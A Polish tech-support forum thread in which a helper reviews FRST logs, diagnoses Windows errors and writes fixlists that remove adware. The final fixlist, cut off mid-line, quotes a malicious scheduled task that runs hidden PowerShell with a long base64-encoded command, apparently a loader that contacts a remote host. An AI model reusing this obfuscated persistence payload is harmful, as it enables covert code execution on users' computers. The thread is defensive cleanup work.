picasso

Upłynęło sporo czasu. Poproszę o serię świeżych raportów FRST (włącznie z Addition), potwierdzających jak na dzień dzisiejszy wygląda sprawa po pomyślnym usuwaniu.

Przepraszam, nie zauważyłam tego zdania z rvkl.exe na końcu. Raporty są limitowane i orientowane na określone zagadnienia. Infekcji tu nie widać. Rozwiń tę myśl, na czym konkretnie polegała blokada Opery? I czy ona nadal ma miejsce? Z raportów nic nie wynika. W dzienniku tylko jakieś bezpłciowe błędy: Error: (01/26/2016 02:49:36 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: opera.exe, wersja: 34.0.2036.25, sygnatura czasowa: 0x5660f702 Nazwa modułu powodującego błąd: opera.dll, wersja: 0.0.0.0, sygnatura czasowa: 0x5660f655 Kod wyjątku: 0x80000003 Przesunięcie błędu: 0x0008e599 Identyfikator procesu powodującego błąd: 0xb48 Godzina uruchomienia aplikacji powodującej błąd: 0xopera.exe0 Ścieżka aplikacji powodującej błąd: opera.exe1 Ścieżka modułu powodującego błąd: opera.exe2 Identyfikator raportu: opera.exe3

Temat przenoszę do działu Windows. To nie jest problem infekcji. Z raportów nic konkretnego nie wynika, ale w Dzienniku zdarzeń jest błąd zawieszenia usługi AVG, co pasowałoby do objawów: Dziennik System: ============= Error: (02/03/2016 09:18:09 AM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi avgsvc. 1. Rozpocznij od próbnej deinstalacji całego majdanu AVG (AVG, AVG Protection, AVG Web TuneUp, Visual Studio 2010 x64 Redistributables, Visual Studio 2012 x64 Redistributables, Visual Studio 2012 x86 Redistributables). Przy okazji pozbądź się też starych wersji: Adobe AIR, Adobe Reader X (10.1.16) MUI, Bonjour. 2. W spoilerze doczyszczanie drobnostek, bez związku z objawami. 3. Zrób nowy log FRST z opcji Skanuj (Scan), z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy po deinstalacji AVG jest poprawa.

Wygląda to na fałszywy komunikat jakiejś infekcji. Poproszę o zrobienie raportów z FRST.

Temat przenoszę do działu Windows. To nie jest problem infekcji. Usługa Windows Update jest jedną z instancji podmontowanych na procesie svchost.exe, więc skoro zachodzi proces wyszukiwania aktualizacji, to wygląda na to, że to właśnie działanie powoduje obciążenie svchost.exe. Co do długiego szukania aktualizacji - czy na pewno jest to problem i dałeś szansę procesowi na ukończenie? W ostatnich miesiącach rzeczywiście wystąpiły pewne zmiany w obsłudze Windows Update i na systemach Vista szukanie może bardzo długo trwać. Ostatnio nawet aktualizowałam Vistę przyjaciela i zajęło mi to kilka dni, rundy z wyszukiwaniem aktualizacji trwały po kilka godzin. Komputer musiałam zostawić na bezczynności, bo obciążenie było wysokie i nie dało się nic innego robić.

Temat przenoszę do działu Windows. To nie jest problem infekcji, w systemie tylko szczątki adware, co nie ma związku. Używany był ComboFix, niepotrzebnie, na ten temat: KLIK. Z raportów nic nie wynika. Jedyne co się wyraźnie rzuca w oczy, to kilka błędów w Dzienniku oraz ślady po starych niepoprawnie usuniętych komponentach paska AVG, nadal aktywne i skombinowane z tworem je zastępującym "AVG Web TuneUp". Sugestie: 1. Deinstalacje: - Odinstaluj stare wersje i zbędniki: Adobe Reader XI - Polish, AVG Web TuneUp, Java 7 Update 11 (64-bit), Java 7 Update 11, Opera 12.17, Qtrax Player. - Uruchom Program Install and Uninstall Troubleshooter i usuń Metric Collection SDK (pozostałość po niechcianej instalacji aplikacji Lenovo). 2. Doczyszczanie różnych śmieci w spoilerze. 3. Uzupełnij wszystkie aktualizacje z Windows Update. Jest tu podejrzenie braku wielu z nich, bo jest stary niewspierany IE8 (obecnie jest wymagana instalacja IE11, by mieć zapewnione dalsze łaty): Platform: Windows 7 Home Premium Service Pack 1 (X64) Język: Polski (Polska) Internet Explorer Wersja 8 (Domyślna przeglądarka: Chrome) 4. Błędy w Dzienniku zdarzeń: Error: (02/09/2016 07:45:23 PM) (Source: Windows Backup) (EventID: 4103) (User: ) Description: Wykonanie kopii zapasowej nie zostało zakończone z powodu błędu zapisu w lokalizacji kopii zapasowej G:\. Błąd: Nie można odnaleźć lokalizacji kopii zapasowej lub jest ona nieprawidłowa. Przejrzyj ustawienia kopii zapasowej i sprawdź lokalizację kopii zapasowej. (0x81000006). W Panelu sterowania zrekonfiguruj opcje Kopii zapasowej, usuwając odnośnik do nieistniejącego dysku. Error: (02/10/2016 05:43:13 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Ten błąd nie ma znaczenia w kontekście problemów, ale usuń go posługując się instrukcjami: KLIK. 5. Po wykonaniu powyższych: - Start > w polu szukania wpisz eventvwr.msc > z prawokliku Uruchom jako Administrator. Rozwiń sekcję Dzienniki systemu Windows i z prawokliku wyczyść gałęzie Aplikacja i System. Następnie rozwiń Dzienniki aplikacji i usług > Microsoft > Windows > CodeIntegrity > z prawokliku wyczyść Operational. Zresetuj system, by nagrały się nowe błędy. - Na koniec zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy jest jakaś poprawa.

Temat przenoszę do działu Windows. Nie ma tu żadnych oznak infekcji. Z raportów nic nie wynika konkretnego. Sugestie: 1. Na partycji D jest krytyczny poziom wolnego miejsca, co może być związane z widocznym spowolnieniem. Ogarnij teren. ==================== Dyski ================================ Drive c: () (Fixed) (Total:58.59 GB) (Free:7.9 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)] Drive d: () (Fixed) (Total:137.27 GB) (Free:0.01 GB) NTFS Drive e: () (Fixed) (Total:134.95 GB) (Free:36.99 GB) NTFS Drive f: () (Fixed) (Total:134.95 GB) (Free:8.96 GB) NTFS I jest też powiązany z brakiem miejsca na którymś dysku błąd Kopii zapasowej: Error: (01/31/2016 07:14:14 PM) (Source: Windows Backup) (EventID: 4104) (User: ) Description: Wykonanie kopii zapasowej nie powiodło się. Błąd: Na tym dysku jest za mało miejsca, aby zapisać kopię zapasową. Zwolnij miejsce, usuwając starsze kopie zapasowe albo niepotrzebne dane, lub zmień ustawienia kopii zapasowej. (0x81000005). 2. W Dzienniku zdarzeń jest sporo błędów związanych z oprogramowaniem nVidia. Sprawdź czy coś da reinstalacja / aktualizacja całego majdanu nVidia. Dziennik Aplikacja: ================== Error: (02/08/2016 09:05:38 PM) (Source: NvStreamSvc) (EventID: 1) (User: ) Description: NvStreamSvcNvVAD initialization failed [6] Error: (02/08/2016 09:05:38 PM) (Source: NvStreamSvc) (EventID: 1) (User: ) Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0] Error: (02/08/2016 01:48:29 PM) (Source: NvStreamSvc) (EventID: 1) (User: ) Description: NvStreamSvcNvVAD initialization failed [6] Error: (02/08/2016 01:48:29 PM) (Source: NvStreamSvc) (EventID: 1) (User: ) Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0] Error: (02/06/2016 07:54:56 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: NvBackend.exe, wersja: 10.11.15.0, sygnatura czasowa: 0x52a6776c Nazwa modułu powodującego błąd: ole32.dll, wersja: 6.1.7601.18915, sygnatura czasowa: 0x55981b9e Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00033a96 Identyfikator procesu powodującego błąd: 0x830 Godzina uruchomienia aplikacji powodującej błąd: 0xNvBackend.exe0 Ścieżka aplikacji powodującej błąd: NvBackend.exe1 Ścieżka modułu powodującego błąd: NvBackend.exe2 Identyfikator raportu: NvBackend.exe3 Error: (02/06/2016 07:54:36 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: NvBackend.exe, wersja: 10.11.15.0, sygnatura czasowa: 0x52a6776c Nazwa modułu powodującego błąd: nvspcap.dll_unloaded, wersja: 0.0.0.0, sygnatura czasowa: 0x52a67618 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x100be510 Identyfikator procesu powodującego błąd: 0x830 Godzina uruchomienia aplikacji powodującej błąd: 0xNvBackend.exe0 Ścieżka aplikacji powodującej błąd: NvBackend.exe1 Ścieżka modułu powodującego błąd: NvBackend.exe2 Identyfikator raportu: NvBackend.exe3 Error: (02/01/2016 06:17:04 PM) (Source: NvStreamSvc) (EventID: 1) (User: ) Description: NvStreamSvcNvVAD initialization failed [6] Error: (02/01/2016 06:17:03 PM) (Source: NvStreamSvc) (EventID: 1) (User: ) Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0] 3. Inne uwagi: - DAEMON Tools Lite działa na starym sterowniku SPTD. Deinstalację tego sterownika i jego aktualizację opisuje ten temat: KLIK. - Odinstaluj zbędny program HP Deskjet 3520 series — badanie mające na celu poprawę produktów oraz stary SUPERAntiSpyware (wersja na sterownikach z 2011). - Zaktualizuj Avast do najnowszej wersji. PS. W spoilerze małe doczyszczenie drobnostek, co nie powinno mieć żadego wpływu na poprawę stanu systemu.

Drobne poprawki. Otwórz Notatnik i wklej w nim: DeleteKey: HKCU\Software\Mozilla\Extends DeleteKey: HKCU\Software\RST DeleteKey: HKCU\Software\HQ Video Pro 3.1cV20.04 DeleteKey: HKCU\Software\HQ Video Pro 3.1cV20.04-nv-ie DeleteKey: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer DeleteKey: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\yoursites123.com DeleteKey: HKLM\SOFTWARE\Wow6432Node\FFPluginHp DeleteKey: HKLM\SOFTWARE\Wow6432Node\hdcode DeleteKey: HKLM\SOFTWARE\Wow6432Node\TSv DeleteKey: HKLM\SOFTWARE\Wow6432Node\HQ Video Pro 3.1cV20.04 DeleteKey: HKLM\SOFTWARE\Wow6432Node\HQ Video Pro 3.1cV20.04-nv-ie DeleteKey: HKU\S-1-5-18\Software\HQ Video Pro 3.1cV20.04-nv-ie RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\HQ Video Pro 3.1cV20.04 RemoveDirectory: C:\Users\Zajace4\Desktop\Stare dane programu Firefox Folder: C:\ProgramData\{010DD54D-6F97-418D-BC47-2089F30A0075} Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt.

Zabrakło FRST.txt z konta Dom, co miało przedstawić konfigurację przeglądarek na tym koncie (każdy FRST.txt przedstawia inne profile). I drobne poprawki: NA KONCIE FILIP 1. Odinstaluj śmieci adware Gameo i Torch. 2. Ustaw jako domyślną wybraną przeglądarkę. Aktualnie jest wyasygnowany nieistniejący obiekt "Torch". 3. Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-2087539395-219842756-2214252671-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130937265018648225&GUID=00000000-0000-0000-0000-000000000000 URLSearchHook: HKU\S-1-5-21-2087539395-219842756-2214252671-1003 - (Brak nazwy) - {0740f3dd-e1f0-4ec6-8855-04f999d071fa} - C:\Program Files (x86)\DownSpeedTest_dq\bar\1.bin\dqSrcAs.dll Brak pliku SearchScopes: HKU\S-1-5-21-2087539395-219842756-2214252671-1003 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = FF Plugin HKU\S-1-5-21-2087539395-219842756-2214252671-1003: TorchVLC -> C:\Users\Filip\AppData\Local\Torch\Plugins\Video\VLC\npvlc.dll [Brak pliku] Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. NA KONCIE DOM 1. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\MFAData RemoveDirectory: C:\Program Files\HaoZip RemoveDirectory: C:\Users\Filip\AppData\Roaming\HaoZip RemoveDirectory: C:\Users\Kacper\AppData\Roaming\HaoZip Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Wszystko zroione. Kończymy: 1. Przez SHIFT+DEL (omija Kosz) skasuj z dysku odpadkowy folder: C:\ProgramData\Spybot - Search & Destroy. 2. Zastosuj narzędzie Fix-it usuwające drobny błąd WMI: KLIK. 3. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. Jest to bardzo stara wersja z niezałatanymi lukami, jedna z dróg infekcji, np. szyfrujących dane (!). W w/w linku jest podane jaka jest najnowsza wersja Adobe Reader. Najlepszy do czyszczenia adware to AdwCleaner, ale akurat nie wykrywa tej modyfikacji. Jest wiele elementów adware, które są niewykrywalne narzędziami, zapóźnienie w detekcji.

Prócz tytułowego problemu, jest więcej aktywnych obiektów adware. Powinieneś także widzieć rozmaite reklamy, np. na Allegro. Działania do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130993241260851382&GUID=00000000-0000-0000-0000-000000000000 HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yoursites123.com/?type=hp&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://yoursites123.com/web?type=ds&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-1157007284-3841837932-3106168173-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://yoursites123.com/web?type=ds&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6&q={searchTerms} SearchScopes: HKU\S-1-5-21-1157007284-3841837932-3106168173-1000 -> {szukaj.gazeta.pl} URL = hxxp://szukaj.gazeta.pl/internet/0,0.html?slowo={searchTerms} BHO-x32: Brak nazwy -> {d00ab4cc-662c-40b6-a85f-d53086f4bb16} -> Brak pliku Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Brak pliku Task: {278A9DBA-62D1-4376-9EA7-ED444CD029B4} - System32\Tasks\AdminShipkeeperXenolithsV2 => Rundll32.exe YardingConservatively.dll,main 7 1 Task: {3A7FD0B5-4676-49CE-9E70-9ED19B714969} - System32\Tasks\{C25597C8-7C39-4F4A-893C-04C6732440F6} => pcalua.exe -a C:\Users\Admin\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=cornl Task: {4EA137CC-4CCE-481A-98FB-901677621525} - System32\Tasks\{6C961D7F-9D78-4A55-8AE3-5F5C92C1DFAC} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar Task: {4EF62F18-F30D-45EF-BC3E-F00E781761FB} - System32\Tasks\{C4E1EAC5-EBC4-4145-ABC0-4530E24C3F04} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin Task: {561026AD-BBB2-4EB8-B29D-48CA246F0762} - System32\Tasks\{70DA3F7B-9CA4-4C2E-AF83-7643DEB344E4} => pcalua.exe -a E:\westerner\setup.exe -d E:\westerner Task: {611B9B6D-76FB-4B4B-B548-B153B94D009F} - System32\Tasks\{410AE0AC-A18D-4FE1-ABCD-70E2873239E8} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin Task: {6C519167-262A-4200-9BBB-ED0FA27AD2DC} - System32\Tasks\{73BE4A54-9082-4DA1-83D9-A314C418D544} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.73.106.456/pl/abandoninstall?page=tsWLM Task: {9091ECCC-0947-4AB5-97A3-F4F7B63BC278} - System32\Tasks\{0F7F7947-050A-797E-7A11-7A090F79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADMAZgB0AGMAWQB5AFYANwAzAHgAcABPAEoAdAAxADkANwBjAFEASQB1AHMAWQBKAGYAbgBBADEAbABjAE8AMgBSAGcAcABpAG4ASgBzAEQAVwBQAGsAQgBBADAARQBrAEsAMwBHAEUAeQBoAEEAYQBrAHIATQBOAF8AMQBLADcAbgBSAGIAWQBoAFMAUQBoAGkAXwBYAHAAbwBjAFIASwBRAEMATABqAFMAdgBxAEEAYwB5ADUAawAzAEQAMgA0AFIAdgB4AHAASwBpAFkASgBmAHoAbwBLADUAVABOAFoAeQBEAEEASQBwAEQATABfAEEAZgBLAEoAcABkAEUAbABUADQAXwBhAFEASgBFAGMAbwB6AEMAQQBJADUAbQBCAGYATABIAEQASABYAFkAcQBwAHMAcQBEAEoAdgByAEoARABHAHUAWABJADUAeABCAHgAawB5AFQANgBjAGIASgAyAGMAaQAwAHUAQQBqADIANwBZAEsALQBZAHkAYwBFADkARwBkAHoARgBHAEoAWABhADMAZABTAGMAQgBGAGIALQA1ADEATwAtAG8ALQBPAFIAdQBwAGEAbgBHAHAAYQBQADIAaABOAG0AcAA5AHoAbQA0AHAAMAA4AEYAeQB4AEEAdwBIAFEAVwBmADcAUgBXAHUANwBRAGkAZwA0ADkAVwBpAG4AWQBLAGkAOAAyAEgAaQBDADMAbwBCAG4AWAAtAFEARQBKAEsAdwBIAHgAMABZADAASQB6AFkAVwBvAEEAagB4AFQATABTAFIAeAB5AFQAQQByAEcAawBoAGMARABGAEgAdgBIAEkAMQBwAEoAdQB3AEQANABGADMAbwBEAEsAeQBtADgATgBkAEkAWgAtAEQATQAwAGMAUwBYADAAMgBiADEALQBkADUAYgAyAG0AaAB0AFQAZwBHAEIARQBoAEYAQgB1AEMAQwBwAEUAWABQAHkAZABpAGcAdwB5AGEAcABZAHgATgB0AEsATAB4AHMAaQBQAHQATABNAHAAcAA0AGoAegBSAFEARABWADQAUwBuAHEAbgBfAEoASABEAGcAMgBmAE0AdgB1AFcARgBNAF8ATgBCADkANAB4AHcARAA2AEEAegAtAEMARQBJAF8ARwBfADAAcAB4ADUAUQBxAGIAUABkAEoAagBHADcATwBZAGsAcQB0AFkAVwBlADcANQBKAHUAVAAzAFEAUQBCADEAawBCAFcAbABVAEMATABIADEAcABpAGoANQBZAFYAVwBlAHAAcQBPAFUAOQA1ADQAeABQAEYAMABCAHMAawBjAEQAbwBQAGIAagBVAGoAeABJADQAZwBGAFYAWgBVAG0AdgBNAFAALQB3AEEAcABiAHcAdgBuAFMATgBGAHIAMwAyAF8AYwAyAEYAcwA1ADMAMwBTAFoAdgA2AFgAQwA3AFMAeABpAHkAUABlAGcAYQBUAFQAQwBTAEYAUABVADMAZQBDAEQAZwBRAHUAWgAwAGYARQBFAC0AUABNADAAOABDADIAVABnAGgAUwB6AC0AaQB5AEsAaABZAEEARgA0AEUAeQA3AHEATwB0AHEAZQA2AEwARAB3ADIATwBuAGkAcgBiADAAdAAyAG8AcwA1AEMAWAB4AF8AcABQAE4AYwBPADkAbwBvADMAdAB0AEgARwBfAEkAaQBhAGYAQQBPAHYAcABaAGkAcwBlAEQAUgB4AFAAeQAyAHUALQA4AEkAXwBtAHMARgAxAEMAMQA2AFcARwBlAFUAQwB0AHQALQBtAGcANgB6AFMAdQBtAGwAcABJAGgARQBGAEwAOQAwAEMAMQB1AHcAWQA5AEUANgBnADUAbgBGAEYANABkAGcAMABVADMAcQBsAFUAbABfAHYAVwBDAHkARgBCAEIAdwBGAGsAQQBWAHcAaAB6AEQASgByADMAMQBNAEQASgAzAEMAcwBVAEoAMwBCAGMAXwBMADEARwBJAFcASgBtAFYAUwBpADUAVABFAGkARgBkAHkAdQBkAHcAMgBzAEMAaAA3AHcALQBMAE4AYQBFAEcANQBvAHMAagBDAEEAeQB5ADUALQBwAG0AdwBhAFYAdwBoAG0AeABBAGUAMQBjAFMANABuADUAcABzAFQAegBfAGEANQBfAEgAaQBoAEkAZgBKADkAcQAxAGYAYQBIAHYAaABaAGEAUQB0AGwAMABJAFQAQQBQAEUAcQBUAGUAbAAtAHcARwBlAHoANQBpADIAdgB5AFUAcgBjAF8AYwAyAGMAdwB4AEEAeQA4AGIAbgAzADIAUgB5AEkAUgBWAEMAbgBGAFoAbQBaAEIAMwAwAHMAcQBWAEUANQB5ADQANwBZAFIANwBqADcAZwA3AFQAZgBNADcAagBRADkAawB5ACYAYwA9AEMAUABaADAASAA1AEkANQBxAFQAcQBuAFEAMgBVADIAZAA0AFEAWQAtAFcARQB5AE8AUQBGAE8AYwBRAHAAegAwAEIAWgBLADYAUgBTAHkAVgBRAEUAYQBSAEEAXwBtAFIARwBZAGUAUgBhAEIAZwBOAC0AZAAwADgAWgB4ADcATwBWAGIAUwB3AEgARwBlADkATABlAEIASgBQADgAVgBIAHcAdQBGAHYANwBtAFYAVgBZAEcAdAB4AHcARQBUAHYAUABnAHEAaQAzAG8AQQBxAEUAdQB2AHEATQBWAHoAVABpAGwANABIAHEAZgBkADYAXwB5ADIASAAxAFMASABiAEIAUwBhADAAWAA2AEcAcQBSAHAAcQBIAG4AeQB4AG8AdgBHAE0AMgBRAE4AOAAxADIAZABrAG8ANQBiAGQAOQBzAFUATABEAGwATQB2ADIAeABkADkAYgBEAFAATQB5AEYAMABFAHgAWABmAHYAVAA1ADQAUgBDAFIARwBEAGUAdABpAEEAVAB2ADIASgBaAGsAeQB5ADEAdAAzAGoAZwB5AHUAZwBRAFQAQQBrADEAYwB6ADcAYQBEAHoAQwBNADcATgAwAHcAXwBUAGkATQByADAANABEADYAUwBpAEMATwBwAHcAMgB5ADIAcwBiAGoAUQBpAHgAdQBfAGgAZAA2AHMAagBfAHoASwBQAHoALQBoAEwAWABKAC0AUAB5AHkAUQA1AEgAawBNAFQALQBXAEMAbgBFAGIAVwBiAFIAcwB2AGYARQBZAEEARABOAGwAMABSAE8AUABxAHQAMwBHADAATQBmAEwAYgA4ADMASQBQAGsAMgBmAGwANwBCAHUATgA0AGYAUgBwAFcAdABVADcAVgBuAHoAXwA2AFIATgBKAHEAagBiAFAAQQBfAGIAZABHAHoAcQBVADIAagBSAHkAQwBhAGkAMABzAHMAQgBCAGcAUAAxAHEAQQBRAEkAOQBEAHoAcABWAE4AbQB3AEMAUgBEAG0AcQBrADcAbABEADMAeABqAFAAMgBwAFoAVgB6AFoAOABmAEkALQBRAHkAVQBFAGoARgBSAEkATwBvAE0ARwBrAEQAUQA2AEcAVQBOAFoATQBZAEoAWQBrADYAdABUAC0AUwAzAGcATgAwADIAWABLAFYANwA3AE4AeQB0AFkAbgBwAHEANwA5AG8ANwAzAF8AVQAyAHMAbQBvAE4AcQBsAGoASwBaAF8AawB1AG4AVABMAG0AbwB1AFQAYgA4AFQASQA5AEcAMgBPAEQAUQBjAEgARQBMAFEATgBjAE0AYQB6AGcAMQBpAEgAUAB6AGIAMABIAEMAOABqAGwAQgA3AG8AMwBUAGEAWgBfAGYAdQBJAF8AUwBrAFYAQgBoADEAdgBXADUAQgBUAG8AdgBvAFIALQBtAEIAcwBKAGoAOQBMAGQAegBEADIATABuAEEALQBiADcAagB2ADcAagBTAGgAQQBzAHcAUgBkAEUAUwBMAHEAaQBJAEoAMwBHAEwAQwBrAGgAcQBsAFYAZABQAEMAegBEAEUAVQAwAGwASwBRAHcAYwBpAFcARwBPAHIALQBhAGUANwAxAHcAUQBWAC0AbgBGAGsANgB3AFoAZQA4AEcAUQA5AFQATQBkAEQAawBtAEcATQBEAHUAcgBtAGIAQwBoADgAaABwAC0ARQB3AEgALQBXAEsARQBIAG4AdQBkAHUAcwB5ADEAcwBEAFYAcABPAGkAbwBGAHEAZQBlADEAXwA5AGgATwBMAGUANgB6AHUANQBuAC0AXwAzAHEAMgB5AGwAUgBDAFUAUAB2AHcAbABnAFUAVgAwAEQARwA0AGcARgBBAEsAcABjAEUANQAzAHYAUQA2AEMAcwBRADAARQBNADkARABUADgAdQBuAHcANABaAHEAZwA5ADQAaABnADUAcABqAGYAawBuAEcAVABRAEcAZQBwAHAAVgBlAEoAWQBoAEcAcwBoAGMAVwB6AHQAeQBXAFMAYgBHADIASwB3AFUAYgB5AHEAMgBJAGwARQA0AFUALQBIAG0AQgAwAEIAMAB0ADUAWQBnAGoAQwBkAHIAawBYAGgARABsAHkAUAB0AFgAcQBkAGcATgBzAGUANgBZAGwATABvAHkAbgAxAHoAQwBkAEcAaQBFAGsAbABsADEAcABfAEUAbgBjAHAAcgB1AFEANwBkAGwAOABRAHkATwAtAG8AbwBLAGcAegBXAGUAOABRADUAeABwAEEAMgB3AE0ASgBLAFQASwBYAGIAYwBjAGEAQQBEAG8ASgBjAFMAWgBIAGQAcgBsAGgAQgBQAEIAeAA0AF8AdgByAEIANABBAFUANwAxAHEAbgBBAEwAdQBiAEMAcgB5AFoAQgBvAEYAUQBmAHQAZwBkADEALQBXAGMAWAByAGsAWQBfACYAcgA9ADEANwA1ADMAMwA2ADYAMwA3ADUANwAwADkAOQA5ADYAMwAwADcAIgA7AC